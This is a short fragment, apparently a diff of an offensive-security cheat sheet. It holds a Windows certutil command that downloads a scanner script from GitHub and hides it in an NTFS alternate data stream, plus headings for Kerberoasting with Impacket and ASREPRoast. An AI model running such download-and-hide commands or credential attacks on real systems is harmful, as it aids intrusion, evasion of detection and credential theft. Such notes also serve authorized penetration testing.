Windows

 certutil.exe -urlcache -split -f https://github.com/RoseSecurity/APOLOGEE/blob/main/siemens_field_panel_scanner.py c:\temp:apologee.py

-Kerberoasting with Impacket:
+Kerberoasting with Impacket

 ASREPRoast